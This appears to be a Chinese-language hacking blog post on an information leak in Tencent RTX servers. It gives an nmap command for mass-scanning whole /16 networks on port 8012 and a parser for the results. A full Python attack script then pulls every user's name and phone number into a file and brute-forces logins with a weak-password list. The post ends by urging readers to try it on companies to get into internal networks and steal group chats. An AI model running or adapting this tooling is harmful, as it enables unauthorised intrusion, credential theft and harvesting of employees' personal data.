腾讯通RTX(Real Time eXchange)是腾讯公司推出的企业级实时通信平台.
rtx server 存在暴露用户信息的漏洞,通过web访问
http://RtxServerIp:8012/userlist.php #泄漏公司所有rtx用户
http://RtxServerIp:8012/getmobile.cgi?receiver= #泄漏用户手机号
http://RtxServerIp:8012/check.php #验证弱口令
脚本化攻击思路:
sudo nmap -sS -T4 -Pn -p8012 xxx.xxx.xxx.0/16 -oX out.xml nmap 扫描大网段以基数来填补精度的不足,然后我们得到一个开着nmap扫描的out.xml文
分析out.xml文件提取开放8012端口的ip
rtx攻击脚本处理这些ip,探测弱口令
步骤2 分析nmap结果的脚本xml.py
#!/usr/bin/env python #-*- coding= utf-8 -*- import xml.etree.ElementTree as ET tree = ET.parse("out.xml") doc = tree.getroot() for x in doc: if x.tag == 'host': xlist = x.getchildren() ports = xlist[3] port = ports.getchildren()[0] state = port.getchildren()[0] if state.get('state') == 'open': print xlist[1].get('addr')
步骤3 rtx server attack 脚本
#!/usr/bin/env python #-*-coding=utf-8-*- # date : 2013.12.16 # author : l137 # rtx hack import threading import urllib import re import sys import getopt import json import threading import httplib import time def usage(): print ''' Usage : ./f.py -u target_ip -h Show this page! ''' class postThread(threading.Thread): def __init__(self, data): threading.Thread.__init__(self) self.data = data def run(self): for x in self.data: try: print self.data except Exception, e: print e class rtx(object): 'rtx attacker class' ip = '' data = '' port = '8012' fullData = '' def __init__(self, ip): if self.checkIp(ip): self.ip = ip url = "http://"+ip+":"+self.port+"/userlist.php" try: content = urllib.urlopen(url).read() self.data = json.loads(content) except (IOError,ValueError),e: print "\033[1;31m"+self.ip+"\33[0m is not vulnerable!" sys.exit() self.checkVulnerable() #print self.data self.checkPhone() self.bruteforce() else: print " ______________" print " \033[07m are you kidding me? \033[27m " print " \ " print " \ \033[1;31m,__,\033[1;m " print " \ \033[1;31m(\033[1;moo\033[1;31m)____\033[1;m " print " \033[1;31m(__) )\ \033[1;m " print " \033[1;31m ||--|| \033[1;m\033[05m*\033[25m\033[1;m [ l137 | lietdai@gmail.com ]\r\n\r\n" @staticmethod def checkIp(ip): pattern = r"\b(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b" if re.match(pattern, ip): return True else: return False def checkVulnerable(self): print "\033[1;31m Oh...I got something!!" print " Please wait a bit....." #for x in range(len(self.data)): # print self.data[x] print " "+str(len(self.data))+" records was found!! \033[0m" def checkPhone(self): print "\033[1;31m Now check phone number in records.....\033[0m" url = "http://"+self.ip+":"+self.port+"/getmobile.cgi?receiver=" output = file('out.txt','w') for x in xrange(0,len(self.data)): url2 = url + self.data[x]['name'] self.data[x]['phone'] = urllib.urlopen(url2).read() try: output.write(str(self.data[x]['id'])+'\t'+self.data[x]['name']+'\t'+self.data[x]['phone']+'\n') print self.data[x] except Exception,e: print e output.close() print "\033[1;31m put the records int out.txt\033[0m" #print self.data def bruteforce(self): print "\033[1;31m Brute force starting...." num = raw_input(" Please input the number of threads for brute force(default 10) : ") print " And it will take a little time ...\033[0m" if num == '': num = 10 else : try : num = int(num) except ValueError,e: print e sys.exit() if (num < 1) or (num > 15): print "threads must in 1-15" sys.exit() threads = []; block = len(self.data)/num for i in xrange(0, num): if i == num-1: data = self.data[block*i:] else: data = self.data[i*block:(i+1)*block] t = threading.Thread(target=self.fwork, args = (self.port, self.ip, data)) threads.append(t) for i in threads: i.start() @staticmethod def fwork(port,ip,b): for x in xrange(0,len(b)): dicts = ['111111','123456','qweasd','222222','12345678','000000','qusiba','666666'] #dicts.append(b[x]['phone']) dicts.append(b[x]['name']) for x in dicts: httpClient = None try: name = dicts[-1] postData = urllib.urlencode({'user':name,'pwd':x}) headers = {"Content-type":"application/x-www-form-urlencoded", "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"}; httpClient = httplib.HTTPConnection(ip, port, timeout=30) httpClient.request("POST", "/check.php", postData, headers) response = httpClient.getresponse() responseHeader = response.getheaders() if responseHeader[1][1] == '2573': print name,x except Exception, e: print e finally: httpClient.close() def getWeakPass(self): file_ob = open("password.txt") try: list_file = file_ob.readlines() finally: file_ob.close() for x in list_file: self.dists.append(x.strip('\n')) def main(): try: opts, args = getopt.getopt(sys.argv[1:], "u:h", ["help"]) except getopt.GetoptError: usage() sys.exit() for o,a in opts: if o in ("-h", "--help"): usage() elif o == "-u": r = rtx(a) else : usage() if len(opts) == 0: usage() if __name__ == "__main__" : main()
这里会获取很多很重要公司的员工rtx帐号,进入内网后可以窃取群聊内容.大家自己试试就行...
截图:
964条记录
参考: